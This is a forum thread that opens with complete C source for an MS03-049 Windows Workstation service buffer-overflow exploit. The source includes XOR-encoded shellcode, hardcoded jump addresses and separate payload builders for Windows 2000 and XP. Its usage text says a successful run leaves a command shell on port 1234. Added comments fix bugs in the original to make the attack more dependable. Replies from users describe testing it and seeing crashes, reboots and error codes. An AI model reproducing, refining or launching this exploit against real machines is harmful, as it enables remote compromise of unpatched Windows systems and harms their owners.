
Anarchy
It's easy to recompile. :)

CODE

#include <windows.h>
#include <lm.h>
#include <stdio.h>
#include <string.h>



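/*
 * Function-pointer type used for both entry points this tool resolves at
 * runtime with GetProcAddress (NetAddAlternateComputerName on the XP path,
 * NetValidateName on the Windows 2000 path).  main() calls whichever one it
 * found with (server, oversized name, NULL, NULL, 0).
 *
 * The posted version had the return type commented out, which left the
 * pointer with an implicit-int, default (__cdecl) signature.  The Net* APIs
 * are declared NET_API_FUNCTION (__stdcall on x86), so calling them through
 * a __cdecl pointer leaves the stack pointer mis-adjusted after the call;
 * it only "worked" because the compiler's frame-pointer epilogue papered
 * over it.  Restoring NET_API_STATUS / NET_API_FUNCTION (both from <lm.h>)
 * makes the call convention match.  The IN/OPTIONAL SAL macros were empty
 * and are dropped.
 */
typedef NET_API_STATUS (NET_API_FUNCTION *MYPROC)(
    LPCWSTR Server,                 /* "\\\\host" as a wide string */
    LPCWSTR AlternateName,          /* the attack buffer, passed as a name */
    LPCWSTR DomainAccount,          /* NULL in this tool */
    LPCWSTR DomainAccountPassword,  /* NULL in this tool */
    ULONG   Reserved                /* 0 in this tool */
);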


#define SIZE 8192   /* byte size of the attack buffer built in main() */

#pragma comment(lib,"mpr.lib")     /* MSVC link directive: WNetAddConnection2 / WNetCancelConnection2 */

#pragma comment(lib,"Ws2_32.lib")  /* NOTE(review): nothing in this listing calls Winsock (no winsock header is included); looks like a leftover */


/*
 * Payload carried inside the oversized "name" string.  Only what is visible on
 * this page can be said about it: the usage text in main() promises a command
 * shell reachable with "nc Ip 1234", and main() copies these bytes into the
 * buffer either as-is (Windows 2000 path) or one byte per UTF-16 code unit
 * (XP path).
 *
 * The first 23 bytes read as a self-locating XOR decoder: jmp / call / pop to
 * obtain its own address, then `xor byte [edx+ecx], 0x1b` in a loop with
 * cx = 0x1e4 (484).  The encoded body that follows is 477 bytes, so the loop
 * also rewrites the 7 bytes immediately after the payload in the buffer.
 * The array appears to contain no 0x00 byte, which is what lets the two
 * string-based copies in main() carry it intact.
 *
 * NOTE(review): the decoded body is not shown anywhere on this page.  Treat it
 * as untrusted code — decode and disassemble it before running this tool
 * against anything, rather than taking the "nc 1234" description on faith.
 */
unsigned char shellcode[] =

/* decoder stub, 23 bytes */
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\xe4\x01\x80\x34\x0A\x1b\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
/* encoded body, XOR key 0x1b, 477 bytes */
"\x98\xF7\x2F\x90\xEF\xF3\x5C\x1A\x1B\x1B\x92\x1D\xE4\x2D\x73\x95"
"\x55\x15\xF7\xF3\x7A\x1A\x1B\x1B\x92\x5D\x13\xE4\x2D\x73\xB6\xC2"
"\x1E\xD5\xF3\x49\x1A\x1B\x1B\x92\x5D\x17\x73\x77\x77\x1B\x1B\x73"
"\x28\x29\x35\x7F\x73\x6C\x68\x29\x44\x4F\xE4\x4D\x13\x92\x5D\x1F"
"\xE4\x2D\x73\x69\xE5\xA8\x0D\xF3\x36\x1A\x1B\x1B\x92\x5D\x0B\xE4"
"\x2D\x73\xF4\xD5\xFB\x7B\xF3\x05\x1A\x1B\x1B\x92\x5D\x0F\xE4\x6D"
"\x1F\x73\xD0\xF6\xE7\x20\xF3\x15\x1A\x1B\x1B\x92\x5D\x03\xE4\x6D"
"\x1F\x73\xC2\x12\xEE\xB6\xF3\xE5\x1B\x1B\x1B\x92\x5D\x07\xE4\x6D"
"\x1F\x73\xBF\x01\x6B\xDC\xF3\xF5\x1B\x1B\x1B\x92\x5D\x3B\xE4\x6D"
"\x1F\x73\xBF\xB6\x35\xF2\xF3\xC5\x1B\x1B\x1B\x92\x5D\x3F\xE4\x6D"
"\x1F\x73\xFE\x52\x9D\x52\xF3\xD5\x1B\x1B\x1B\x92\x5D\x33\xE4\x6D"
"\x1F\x73\xFC\x62\xDD\x62\xF3\xA5\x1B\x1B\x1B\x92\x5D\x37\x28\xE4"
"\x9A\xF7\x8B\x1A\x1B\x1B\x4F\x73\x1A\x1A\x1B\x1B\xE4\x4D\x03\x4B"
"\x4B\x4B\x4B\x5B\x4B\x5B\x4B\xE4\x4D\x07\x90\xC3\x4C\x4C\x73\x19"
"\x1B\x1F\xC9\x90\xD7\x71\x0D\x4A\x48\xE4\x4D\x3B\x4C\x48\xE4\x4D"
"\x3F\x4C\x4A\x48\xE4\x4D\x33\x90\xCB\x73\x7E\x63\x7E\x1B\x73\x78"
"\x76\x7F\x35\x92\x7D\x2B\x98\xF7\x4F\x96\x27\x3F\x28\xDB\x28\xD2"
"\x98\xDA\x0E\xB0\xF9\xE6\xDD\x5F\x3F\x0B\x5F\xE5\x5F\x3F\x26\x92"
"\x4F\x3F\x53\x92\x4F\x3F\x57\x92\x4F\x3F\x4B\x96\x5F\x3F\x0B\x4F"
"\x4B\x4A\x4A\x4A\x71\x1A\x4A\x4A\xE4\x6D\x2B\x4A\xE4\x4D\x0B\x90"
"\xD7\x71\xE4\xE4\x2A\xE4\x4D\x17\x90\xD3\x4C\xE4\x4D\x37\xE4\x4D"
"\x0F\x4E\x4D\x7F\xBA\x2B\x1B\x1B\x1B\x9E\xDB\x63\x17\x90\x5B\x17"
"\x90\x6B\x07\xB6\x90\x73\x13\xF0\x12\x90\x5B\x2F\x90\xB3\xA3\x1B"
"\x1B\x1B\x90\xDE\x45\x46\xD9\x1F\x1B\x48\x4E\x4D\x4C\x90\x77\x3F"
"\x03\x90\x5E\x27\x90\x4F\x1E\x63\x18\xCE\x90\x51\x03\x90\x41\x3B"
"\x18\xC6\xF8\x29\x52\x90\x2F\x90\x18\xEE\x28\xE4\xE7\x28\xDB\xB7"
"\x21\xDF\x6F\x1C\xDA\xD4\x16\x18\xE3\xF0\xE9\x20\x67\x3F\x0F\x6E"
"\xFA\x90\x41\x3F\x18\xC6\x7D\x90\x17\x50\x90\x41\x07\x18\xC6\x90"
"\x1F\x90\x18\xDE\xF0\x19\x28\xDB\x90\xCE\x44\x45\x46\x40\xD9\x1F"
"\x1B\x8B\x8B\x8B\x9B\xA4\x29\x8F\xF8\xC9\x4D\xAF\x1B";



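/*
 * Fill the attack string for the Windows 2000 path (NetValidateName).
 *
 * Byte layout of the SIZE-byte buffer:
 *   [0, sizeof(shellcode)-1)  decoder + encoded payload, without the trailing NUL
 *   up to 2047                0x41 filler, except the 4-byte value 0x7ffa4a1b
 *                             written at offsets 1851 and 2017 (the tool does
 *                             not say what that address points to)
 *   2048, 2049                a full zero wide character ending the string
 *
 * The posted version zeroed only byte 2048.  Since the callee takes an
 * LPCWSTR, a lone zero byte at an even offset does not end the string (the
 * code unit there was 0x4100), so the length the callee saw depended on
 * whatever followed the buffer on this tool's own stack.  Writing a full wide
 * NUL makes it deterministic: 1024 wide characters.
 */
static void build_w2k_payload(unsigned char *buf)
{
    memset(buf, 0x41, SIZE);
    memcpy(buf, shellcode, sizeof(shellcode) - 1);
    memcpy(buf + 1851, "\x1b\x4a\xfa\x7f", 4);
    memcpy(buf + 2017, "\x1b\x4a\xfa\x7f", 4);
    buf[2048] = 0;
    buf[2049] = 0;
}

/*
 * Fill the attack string for the Windows XP path (NetAddAlternateComputerName).
 *
 * Here the buffer is built as UTF-16: every byte of interest sits in the low
 * half of a code unit whose high byte is zero.
 *   code units [0, SIZE/2)   0x0041 filler
 *   code units [2044, 2048)  0x0012 0x0045 0x00fa 0x007f (a 0x7ffa4512 value,
 *                            one byte per unit; what it points to is not said)
 *   code units from 2064     every byte of shellcode, including its terminating
 *                            NUL, one per unit — that final 0x0000 is what ends
 *                            the string
 */
static void build_xp_payload(unsigned char *buf)
{
    size_t j;

    for (j = 0; j < SIZE / 2; j++) {
        buf[j * 2] = 0x41;
        buf[j * 2 + 1] = 0;
    }
    memcpy(buf + 2044 * 2, "\x12\x00\x45\x00\xfa\x00\x7f\x00", 8);
    for (j = 0; j < sizeof(shellcode); j++) {
        buf[2064 * 2 + j * 2] = shellcode[j];
        buf[2064 * 2 + j * 2 + 1] = 0;
    }
    buf[SIZE - 1] = 0;   /* already zero from the fill loop; kept from the original */
}

/*
 * Print the value the API call returned, exactly as the original did, and add
 * the matching Win32/RPC message on stderr so the number is not a mystery.
 * A nonzero value is an error code returned by the call, not a port number;
 * zero means the call returned normally.
 */
static void report_status(int status)
{
    char text[512];
    DWORD len;

    printf("%d\n", status);
    len = FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
                         NULL, (DWORD)status, 0, text, sizeof text, NULL);
    if (len != 0)
        fprintf(stderr, "status %d: %s", status, text);
    else
        fprintf(stderr, "status %d (no system message for this code)\n", status);
}

/*
 * Entry point.  argv[1] is the target host name or IP; an optional argv[2] of
 * "2k" forces the Windows 2000 path.  Flow: open a null session to
 * \\host\ipc$, load netapi32, resolve the entry point (NetAddAlternateComputerName
 * for XP, NetValidateName for 2000), build the matching oversized "name"
 * string, and call the entry point with it.  The usage text says a successful
 * run leaves a shell reachable with nc on port 1234; the tool itself only
 * prints the status the call returned and cannot tell success from failure.
 * Use only against systems you are authorized to test.
 *
 * Fixes over the posted version: argv[1] is length-checked before being
 * formatted into the 30-byte host buffer (an unchecked sprintf let a long
 * argument overflow this tool's own stack); hostipc/hostl are real character
 * buffers instead of arrays of pointers; NETRESOURCE is zero-initialized; the
 * null session is torn down on every exit path; MultiByteToWideChar is
 * checked; the unused locals and the no-op printf("") are gone.
 */
int main(int argc, char **argv)
{
    int ret = 0;
    HINSTANCE hInstance;
    MYPROC procAddress = NULL;
    unsigned char szBuffer[SIZE];
    NETRESOURCE netResource;
    char host[30];
    char hostipc[sizeof host + 8];   /* host + "\\ipc$" + NUL */
    WCHAR hostl[60];
    int use_xp_entry;

    if (argc < 2) {
        printf("Windows Workstation ms03-049 wkssvc.dll buffer overflow \n "
               "bug discoveried by eEye,code by Hanabishi,shellcode by oc.192 \n "
               "Modified by sbaa(sbaa@163.net) 2003/11/16 ver 0.2\n "
               "Usage: \n "
               "On 2k : \n "
               "%s IP --> attack 2k without ntfs\n "
               "On xp : \n "
               "%s IP 2k --> attack 2k without ntfs\n "
               "%s IP --> attack xp \n "
               "Next open another window : nc Ip 1234 --> Get cmd shell @.@\n",
               argv[0], argv[0], argv[0]);
        return 0;
    }

    /* "\\\\" + name + NUL must fit in host. */
    if (strlen(argv[1]) + 3 > sizeof host) {
        fprintf(stderr, "target name too long (max %u chars)\n",
                (unsigned)(sizeof host - 3));
        return 1;
    }
    sprintf(host, "\\\\%s", argv[1]);
    sprintf(hostipc, "%s\\ipc$", host);

    memset(&netResource, 0, sizeof netResource);
    netResource.lpLocalName = NULL;
    netResource.lpProvider = NULL;
    netResource.dwType = RESOURCETYPE_ANY;
    netResource.lpRemoteName = hostipc;

    /* Null session (empty user and password) to IPC$.  The original carried
     * on when this failed, so it stays best-effort; the code is reported. */
    ret = WNetAddConnection2(&netResource, "", "", 0);
    if (ret != 0) {
        fprintf(stderr, "Can't create null session ! \n");
        fprintf(stderr, "WNetAddConnection2 returned %d; continuing anyway\n", ret);
    }

    hInstance = LoadLibrary("netapi32");
    if (hInstance == NULL) {
        fprintf(stderr, "LoadLibrary failed\n");
        WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE);
        return 1;
    }

    /* Unless "2k" was given as the second argument, try the XP entry point
     * first and fall back to NetValidateName when it is not exported. */
    use_xp_entry = (argc == 2) || (argc > 2 && strcmp(argv[2], "2k") != 0);
    if (use_xp_entry)
        procAddress = (MYPROC)GetProcAddress(hInstance, "NetAddAlternateComputerName");

    if (procAddress == NULL) {
        fprintf(stderr, "can't find NetAddAlternateComputerName (Now try to attack 2k!) \n");
        procAddress = (MYPROC)GetProcAddress(hInstance, "NetValidateName");
        if (procAddress == NULL) {
            fprintf(stderr, "can't find NetValidateName!\n");
            FreeLibrary(hInstance);
            WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE);
            return 1;
        }
        build_w2k_payload(szBuffer);
    } else {
        build_xp_payload(szBuffer);
    }

    memset(hostl, 0, sizeof hostl);
    if (MultiByteToWideChar(CP_ACP, 0, host, -1, hostl,
                            (int)(sizeof hostl / sizeof hostl[0])) == 0) {
        fprintf(stderr, "MultiByteToWideChar failed\n");
        FreeLibrary(hInstance);
        WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE);
        return 1;
    }

    /* C++ (MSVC) try/catch, as in the original.  catch(...) only sees an
     * access violation raised inside the RPC client code when the tool is
     * built with /EHa; under the default /EHsc such a fault is not caught. */
    try {
        ret = procAddress((LPCWSTR)hostl, (LPCWSTR)szBuffer, NULL, NULL, 0);
    } catch (...) {
        fprintf(stderr, "exception during the RPC call\n");
    }

    report_status(ret);
    WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE);
    FreeLibrary(hInstance);
    return 0;
}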



jsands
Yeah, just wondering exactly what this exploit is supposed to do. I tested it on my home PC; it prints 1745 and that's it. Is it supposed to launch a shell? Am I supposed to connect through netcat on port 1745? Thanks for your time.
tribalgoa
I'm seeing about the same: it prints '50' when I run it locally.
wicked
This seems to be the problem: there are no instructions with the code.

Good programming practice usually includes basic instructions on how to use the program; otherwise, who would even know what this does if the name weren't there?

Sorry mate, I'm not trying to take the mickey out of anybody, but I have come across heaps of this kind of code (hell, I've even posted some myself) with no instructions. Perhaps we could compile the source, test it, and write a few lines describing the basic features and how to use the program.

Wkd.

.../


Toilal
Anyone got a test box? What return code should we expect if the buffer overflow succeeds?
DJVASTVASTY2K
printf("Windows Workstation ms03-049 wkssvc.dll buffer overflow \n \
bug discoveried by eEye,code by Hanabishi,shellcode by oc.192 \n \
Modified by sbaa(sbaa@163.net) 2003/11/16 ver 0.2\n \

It was discovered by a big IT security firm, eEye Security — they are the ones who made the tool "Retina".

Best Regards

Adam

Vast Gsm Team

Da Sick Crew
nitrofuran
QUOTE

Next open another window : nc Ip 1234 --> Get cmd shell @.@\n",argv[0],argv[0],argv[0]);

isn't this information enough?
gordan wells
Didn't work for me. I tried it on my local PC and then tried to connect with netcat: nothing, connection refused.
flohand
I tested it on a W2K SP1 box; it rebooted the machine (like MSBlast), but no shell.
(Sorry for my poor English.)
derquakecommander
I tested it on a local Windows XP with no service pack and it crashed my PC so hard that I had to push the reset button, so I can't tell whether there was a shell or anything else.